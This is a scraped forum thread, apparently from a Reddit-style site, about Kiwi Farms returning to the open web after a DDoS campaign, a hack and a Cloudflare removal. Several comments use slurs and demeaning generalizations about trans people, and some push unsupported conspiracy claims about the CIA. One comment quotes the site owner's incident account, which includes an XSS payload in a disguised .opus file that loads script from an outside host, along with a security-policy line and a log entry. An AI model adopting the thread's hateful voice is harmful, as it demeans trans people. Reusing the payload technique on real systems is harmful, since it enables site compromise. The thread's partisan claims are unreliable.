use the following search parameters to narrow your results:
e.g. subreddit:pics site:imgur.com dog
subreddit:pics site:imgur.com dog
advanced search: by author, sub...
~6 users here now
Kiwi Farms lives on the clear net again!
submitted 1 year ago by [deleted] from i.imgur.com
[–][deleted] 9 insightful - 3 fun9 insightful - 2 fun10 insightful - 2 fun10 insightful - 3 fun - 1 year ago (11 children)
i'm really glad about it but....so what? Troons probably will just attack farms again soon.😮💨
[–][deleted] 4 insightful - 2 fun4 insightful - 1 fun5 insightful - 1 fun5 insightful - 2 fun - 1 year ago (10 children)
It's already being DDoSed. It's slow as shit.
[–][deleted] 5 insightful - 3 fun5 insightful - 2 fun6 insightful - 2 fun6 insightful - 3 fun - 1 year ago (8 children)
See? told ya 😮💨
[–]IndianaJones 4 insightful - 3 fun4 insightful - 2 fun5 insightful - 2 fun5 insightful - 3 fun - 1 year ago (7 children)
I'm surprised troons are smart enough to ddos. I thought they'd be the type to trip on bananas or some shit kek, they don't seem very bright.
[–][deleted] 8 insightful - 3 fun8 insightful - 2 fun9 insightful - 2 fun9 insightful - 3 fun - 1 year ago (3 children)
Don't misunderstand troons, my dude. Many of them are highly inteligent and perfectly knows what they are doing. Also, many troons are talented programmers and have shit tons of free time.
[–]jet199 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 1 fun4 insightful - 2 fun - 1 year ago (1 child)
I did once walk in on a debate between troons over whether using a certain programming language can turn you trans.
Apparently python is one to avoid.
[–][deleted] 5 insightful - 5 fun5 insightful - 4 fun6 insightful - 4 fun6 insightful - 5 fun - 1 year ago (0 children)
Lol xd
But yeah, it's fucking bizzare how many programmers are trooning out.🤔
[–]IndianaJones 2 insightful - 1 fun2 insightful - 0 fun3 insightful - 0 fun3 insightful - 1 fun - 1 year ago (0 children)
oh ok sorry
[–]jet199 6 insightful - 2 fun6 insightful - 1 fun7 insightful - 1 fun7 insightful - 2 fun - 1 year ago (2 children)
They don't call them programmer's socks for nothing.
Most trans, even if smart, eventually start claiming disability so they can sit at home all day and wage solo cyber-warfare campaigns against normal decent people.
If not smart they will just become dull social media bots. There are a couple of troons on twitter with over 300 accounts each and that's all they do with their lives.
[–]IndianaJones 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 1 fun4 insightful - 2 fun - 1 year ago (0 children)
Sounds like a pretty sad life! They make me feel better about myself. Haha.
Damn! It's like Jurassic Park out here!
[–]fuk 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 0 fun2 insightful - 1 fun - 1 year ago* (0 children)
TIL, thanks. Any sources for this claim?
[–][deleted] 3 insightful - 4 fun3 insightful - 3 fun4 insightful - 3 fun4 insightful - 4 fun - 1 year ago (4 children)
What is a clearnet and why do they farm kiwi's there?
[–][deleted] 4 insightful - 2 fun4 insightful - 1 fun5 insightful - 1 fun5 insightful - 2 fun - 1 year ago (3 children)
Clear net is just the regular web, not the "dark" web. Kiwi Farms is a site where people obsess over lolcows, crazy internet people.
[–][deleted] 3 insightful - 1 fun3 insightful - 0 fun4 insightful - 0 fun4 insightful - 1 fun - 1 year ago (0 children)
👍
[–][deleted] 1 year ago (1 child)
[deleted]
[–][deleted] 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 0 fun2 insightful - 1 fun - 1 year ago (0 children)
I don't condone it, but I kind of understand when people lash out against the police, abuses are all too common. Does seem weird though he had just sent an apology to the police department and supported blue lives matter.
[–][deleted] 1 year ago (6 children)
[–][deleted] 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - 1 year ago (5 children)
I don't recall reading anything about the password situation besides he didn't think they'd been compromised but it was best to be safe rather than sorry. Apparently the forum software Xenforo does salt and hash passwords, but I've read a technique called rainbow tables can be used to glean the password anyways.
Or he might have modified the code, or it was an obsolete version. Apparently their license for that software has not been renewed for some time because of the content of the site and things are out of date.
[–][deleted] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 1 fun3 insightful - 2 fun - 1 year ago* (4 children)
Apparently the forum software Xenforo does salt and hash passwords, but I've read a technique called rainbow tables can be used to glean the password anyways.
Rainbow table attacks can break 1-way hashing alone, but salting should prevent this
[–][deleted] 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - 1 year ago (3 children)
Interesting. The attacker was able to gain admin access and had free roam of the system for a bit, I imagine this means the salt was comprised and then the rainbow table attack could still work, just take a bit longer.
The site was compromised through his custom chat code, made me think of you actually. The attacker was able to upload a .. fuck, forgot the extension but some audio format file I think (. opus?), And xenforo doesn't verify data. It wasn't audio but a script and somehow it was able to be executed even though it shouldn't have had the permissions. I can look for the Telegram message if you're interested. That got them admin, they tried to get the user data, but it was too big and crashed the system (lol), so instead they just deleted everything.
[–][deleted] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 1 fun3 insightful - 2 fun - 1 year ago (2 children)
Deleted everything? damn I hope they had backups. Yeah definitely curious as to what exactly happened here if you come across the info
[–][deleted] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 1 fun3 insightful - 2 fun - 1 year ago (1 child)
It was all backed up. This is from the Telegram: (link)
The issue was a script injection. I am working on the details. Here is my challenge to any hackers or aspiring hackers.
There is a file called troonshine.opus, with the contents of this: <!DOCTYPE html> <script src=//poz.hiv/load.js></script>
The web document, on the same domain, has a CORS rule that looks like this: <meta http-equiv="Content-Security-Policy" content="script-src 'self' 'nonce-0113ffa9cf5af884e070dd1e36188e5db5ba4bbdacaef1c21a733cea089a7fce'" />
What could you possibly put into that document to get it to load the .opus and have the script execute?
The more finer details are this: XenForo does not validate any file contents. You can write an .opus file that is basically just an HTML document loading a script off-site and if you somehow open it, it does run. I have confirmed this.
The question is of how it got injected. The chat on Kiwi Farms was a Rust websocket chat that was part of a forum rewrite I had been working on. Relevant source: https://github.com/jaw-sh/ruforo/blob/master/src/bin/xf_chat/main.rs https://github.com/jaw-sh/ruforo/blob/master/resources/js/chat.js https://github.com/jaw-sh/ruforo/tree/master/src/bbcode
What baffles me is that even if we did theoretically pass the client a message that was simply instruction to load another script, it should not work, because the security policy of the chat explicitly says that no scripts should run — EVEN FROM THE SAME DOMAIN — unless they are given a nonce token. I know it happened in the chat, though, because I found the access.log entry where it gets opened: x.x.x.x - - [18/Sep/2022:03:03:53 -0400] "GET /data/audio/3696/3696202-c63cc36fd4acb874fdebd0b3988c3410.opus HTTP/1.1" 200 90 "https://kiwifarms.st/test-chat?style=dark" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
So what can be done to make an .opus media file load as an inline web document which can execute its own scripts that violate the CORS of the web document it's loaded into? I just don't understand.
jcmoon@pm.me P.S. If you're going to write me and take credit for the attack, include the name of the random user you made an admin.
Edit: I believe that the .opus file with the xss payload was injected via an iframe that was somehow added to chat. I don't know how they rendered an iframe but that would work.
[–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 1 fun4 insightful - 2 fun - 1 year ago* (0 children)
The chat on Kiwi Farms was a Rust websocket chat that was part of a forum rewrite I had been working on
Yikes, lol, I see why this reminded you of me. Hacking his rusty forum and chat hits a little close to home
So the good news is it doesn't sound like a rainbow table attack was able to break hashed and salted passwords. That would be catastrophic for secuirty. An XSS attack is a more sensible attack vector for something like this. I am no hacker or security expert, but if there was a problem with his code, or even an underlying library that could be exploited, it would explain this. In the server I'm working on, I use the actix-cors library and if anyone can exploit that library i'd be boned, my code depends on all those library implemenatations being correct even if I do everything right on my end
[–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - 1 year ago (15 children)
Weird that the new world order, which you believed was all-powerful and all-encompassing, seems to have...forgotten?....that just a few weeks ago they tried to censor this stalking deaththreat website.
Would you agree with me that a powerful conspiracy probably wasn't behind KF being removed from Cloudflare? Or you think they just forgot about it after a week or two?
[–][deleted] 7 insightful - 3 fun7 insightful - 2 fun8 insightful - 2 fun8 insightful - 3 fun - 1 year ago* (8 children)
Would you agree with me that a powerful conspiracy probably wasn't behind KF being removed from Cloudflare?
Conspiracy? It was a campaign by Keffals. https://teddit.net/r/keffals/comments/x2bzvx/welcome_to_the_official_subreddit_of_the/
They lobbied to get Joshua Moon kicked off Cloudflare so they could DDoS the shit out of the site, pretty sure it's happening again right now.
have...forgotten?....that
Forgotten? Fuck no, I don't know how many companies have dropped Kiwi Farms and Josh so far, but it's been quite the journey to getting the site back, he's probably using some foreign janky ass services, and it is recovering from a hack.
stalking deaththreat website
That's misinformation. It turns out it wasn't even the site that doxxed Keffals, the thinking it was because KF was shining light on him getting DIY hormones to minors.
[–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - 1 year ago (7 children)
It was a campaign by Keffals They lobbied to get Joshua Moon kicked off the thinking it was because KF was shining light on him
It was a campaign by Keffals
They lobbied to get Joshua Moon kicked off
the thinking it was because KF was shining light on him
Look at all the mental gymnastics you have to do, in order to justify your blind belief in whatever the KF admins tell you must have happened.
If only there was a primary source we could check in with, so we didn't have to solely believe the guilty party's version of events.
Oh wait there it. The decision maker himself already wrote why KF was removed. And it was because of the threats of violence that he observed during his personal browsing of that website.
https://blog.cloudflare.com/kiwifarms-blocked/
the rhetoric on the Kiwifarms site and specific, targeted threats have escalated over the last 48 hours to the point that we believe there is an unprecedented emergency and immediate threat to human life unlike we have previously seen from Kiwifarms or any other customer before
[–][deleted] 6 insightful - 2 fun6 insightful - 1 fun7 insightful - 1 fun7 insightful - 2 fun - 1 year ago (6 children)
Since the Christchurch shooting censorship I have infrequently visited Kiwi Farms. I don't see these things they're accused of. The lolcows are their entertainment, they hardly want them to die, there'd be no more entertainment. And the site doesn't endorse anything illegal, users are banned permanently for that. Lots of fucked up things happen on Facebook but they don't get shut down over it, just the little guy.
This is the story the news wouldn't tell, the other side if it: https://kiwifarms.net/threads/dropkiwifarms.128421/
Here's a screen shot it's very detailed, and too long for the entire thing to fit, there's a lot more.
primary source
Like me, a sometimes Kiwi Farms user or that dude who took a quick trip over there and was scared by all the autists.
And think about what sort of people you're defending, Keffals, a piece of shit who delights in helping minors get DIY hormones. That's highly illegal and so's the DDoSing.
[–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - 1 year ago (5 children)
Bruh you had to make a screenshot too long to fit rather than face up to the obvious
primary source Like me
Like me
No - primary source like the original man, the selfsame person who personally decided to take KF off of CF and wrote down his exact reasons why, which I quoted to you above. That kind of primary source
[–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 1 fun4 insightful - 2 fun - 1 year ago (4 children)
https://archive.ph/8g76E here's an archive, probably easier to read if you'd bother to look at the other side of something, only way you're ever going to be able to make an informed decision. And you might even wonder why the version you heard about is so different from the reality of the situation, and on channels you probably thought were accurate and didn't just run anything in a press kit they're paid to.
You said he just personally browsed there. Sounded like maybe once. I was there more. The reason that was initiated was from a letter writing campaign started by Keffals. They got them booted off more than just Cloudflare, that was just the opening shot. Kiwifarms.is, kiwifarms.st, they went through a lot of different domains and providers. Kept getting dropped.
[–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - 1 year ago (3 children)
even wonder why the version you heard about is so different from the reality of the situation, and on channels you probably thought were accurate
Dipshit not only is this NOT a topic that is being discussed outside of Q-adjacent conspiracy communities
But if it was, and the common understanding was not aligned with the wall of text nonsense you're trying to link me to, it would probably be because they're BULLSHITTERS
You said he just personally browsed there. Sounded like maybe once. I was there more.
Facepalm. Yeah but you're not the founder and CEO of cloudflare are you. Unlike the guy I linked you to. And you don't make decisions about what kind of content is too extreme for their platform. And that man was the CEO and was the founder and did make the decision and wrote down exactly why. And yet you find a wall of bullshit too large for a screenshot more credible 🤔...really says a lot about how you take in information for your worldview
[–][deleted] 4 insightful - 2 fun4 insightful - 1 fun5 insightful - 1 fun5 insightful - 2 fun - 1 year ago (2 children)
Remember I showed you how to do a search: https://duckduckgo.com/?q=kiwi+farms&t=brave&iar=news&ia=news is Time magazine and CNN "Q-adjacent conspiracy communities"?
And yet you find a wall of bullshit too large for a screenshot more credible
It all checks out as far as I can tell and lines up with my own experience.
[–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - 1 year ago (1 child)
duckduckgo
The youngest story on there is 8 days ago. Today's development is not a hot topic is it
It all checks out as far as I can tell
Oh really
What checks did you do
Did you compare it against the primary source of the written word of the man who personally took the decision about the company he founded and managed. Did you try running that comparison
[–][deleted] 4 insightful - 2 fun4 insightful - 1 fun5 insightful - 1 fun5 insightful - 2 fun - 1 year ago (0 children)
Today's development is not a hot topic is it
The site coming back is not being covered in the news, although it's an incredibly important story in my estimation. You usually can't fight against big tech, but there's one man doing it. Fighting for his right for him and his fellow autists to be able to make fun of internet celebrities again, which is super fucking lame imo, but freedom of speech causes are often not exactly noble seeming, like Larry Flynt's efforts.
Did you compare it against the primary source of the written word of the man who personally took the decision about the company he founded and managed.
No, that was nonsense. I took it right from the horses mouth, checked out the long and detailed explanation Joshua Moon wrote, along with links, and I see nothing false about it, and I also don't see any users in that thread disagreeing with the facts as outlined. You might expect users to not want to incriminate themselves, but thousands of people would hardly work seamlessly to lie.
[–]LarrySwinger2 5 insightful - 3 fun5 insightful - 2 fun6 insightful - 2 fun6 insightful - 3 fun - 1 year ago (5 children)
The CIA infiltrates groups and companies, from within which they work toward their own covert agenda, and it looks like something organic on the surface. A conspiracy is hard to prove, but I do think a large portion of woke outrage is engineered. The goals is a slow encroachment of civil liberties; they want to make it difficult to host free speech sites, without caring too much about KF in particular. If you look at the smear attack against RMS a couple years ago, you'll see something shady going on, namely that the main articles in that campaign was written by someone who worked for a company that opposes free software. So if there's covert activity going on now, it wouldn't be the first time.
[–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - 1 year ago (4 children)
Ok genius so answer this. In your theory has the CIA just forgotten to remove them off the clearweb? Did they forget that they were supposed to be working on this?
CC u/muskrat - because muskrat didn't think it was the CIA yet this dude thinks it was.
[–][deleted] 5 insightful - 2 fun5 insightful - 1 fun6 insightful - 1 fun6 insightful - 2 fun - 1 year ago (0 children)
Keffals the troon, not the CIA. Can't you read?
[–]LarrySwinger2 2 insightful - 1 fun2 insightful - 0 fun3 insightful - 0 fun3 insightful - 1 fun - 1 year ago (2 children)
I'm leaving open the possibility of CIA involvement, and if it is, it's part of a slow encroachment. It could of course be authentic woke BS.
Alright so you have enough of a CIA theory that they're there, they're in the mix, there's an outline of their involvement.
But because you're basing it on zero evidence other than a conspiracist's mindset, you're unable to answer specifics, like why they seem to have forgotten about it a week later. Is that right?
[–]LarrySwinger2 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 0 fun2 insightful - 1 fun - 1 year ago (0 children)
I've addressed your question twice now. Lrn2read.
[–][deleted] 9 insightful - 3 fun9 insightful - 2 fun10 insightful - 2 fun10 insightful - 3 fun - (11 children)
[–][deleted] 4 insightful - 2 fun4 insightful - 1 fun5 insightful - 1 fun5 insightful - 2 fun - (10 children)
[–][deleted] 5 insightful - 3 fun5 insightful - 2 fun6 insightful - 2 fun6 insightful - 3 fun - (8 children)
[–]IndianaJones 4 insightful - 3 fun4 insightful - 2 fun5 insightful - 2 fun5 insightful - 3 fun - (7 children)
[–][deleted] 8 insightful - 3 fun8 insightful - 2 fun9 insightful - 2 fun9 insightful - 3 fun - (3 children)
[–]jet199 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 1 fun4 insightful - 2 fun - (1 child)
[–][deleted] 5 insightful - 5 fun5 insightful - 4 fun6 insightful - 4 fun6 insightful - 5 fun - (0 children)
[–]IndianaJones 2 insightful - 1 fun2 insightful - 0 fun3 insightful - 0 fun3 insightful - 1 fun - (0 children)
[–]jet199 6 insightful - 2 fun6 insightful - 1 fun7 insightful - 1 fun7 insightful - 2 fun - (2 children)
[–]IndianaJones 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 1 fun4 insightful - 2 fun - (0 children)
[–]fuk 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 0 fun2 insightful - 1 fun - (0 children)
[–][deleted] 3 insightful - 4 fun3 insightful - 3 fun4 insightful - 3 fun4 insightful - 4 fun - (4 children)
[–][deleted] 4 insightful - 2 fun4 insightful - 1 fun5 insightful - 1 fun5 insightful - 2 fun - (3 children)
[–][deleted] 3 insightful - 1 fun3 insightful - 0 fun4 insightful - 0 fun4 insightful - 1 fun - (0 children)
[–][deleted] (1 child)
[deleted]
[–][deleted] 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 0 fun2 insightful - 1 fun - (0 children)
[–][deleted] (6 children)
[deleted]
[–][deleted] 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - (5 children)
[–][deleted] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 1 fun3 insightful - 2 fun - (4 children)
[–][deleted] 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - (3 children)
[–][deleted] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 1 fun3 insightful - 2 fun - (2 children)
[–][deleted] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 1 fun3 insightful - 2 fun - (1 child)
[–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 1 fun4 insightful - 2 fun - (0 children)
[–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - (15 children)
[–][deleted] 7 insightful - 3 fun7 insightful - 2 fun8 insightful - 2 fun8 insightful - 3 fun - (8 children)
[–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - (7 children)
[–][deleted] 6 insightful - 2 fun6 insightful - 1 fun7 insightful - 1 fun7 insightful - 2 fun - (6 children)
[–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - (5 children)
[–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 1 fun4 insightful - 2 fun - (4 children)
[–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - (3 children)
[–][deleted] 4 insightful - 2 fun4 insightful - 1 fun5 insightful - 1 fun5 insightful - 2 fun - (2 children)
[–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - (1 child)
[–][deleted] 4 insightful - 2 fun4 insightful - 1 fun5 insightful - 1 fun5 insightful - 2 fun - (0 children)
[–]LarrySwinger2 5 insightful - 3 fun5 insightful - 2 fun6 insightful - 2 fun6 insightful - 3 fun - (5 children)
[–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - (4 children)
[–][deleted] 5 insightful - 2 fun5 insightful - 1 fun6 insightful - 1 fun6 insightful - 2 fun - (0 children)
[–]LarrySwinger2 2 insightful - 1 fun2 insightful - 0 fun3 insightful - 0 fun3 insightful - 1 fun - (2 children)
[–]Site_rly_sux 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 1 fun2 insightful - 2 fun - (1 child)
[–]LarrySwinger2 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 0 fun2 insightful - 1 fun - (0 children)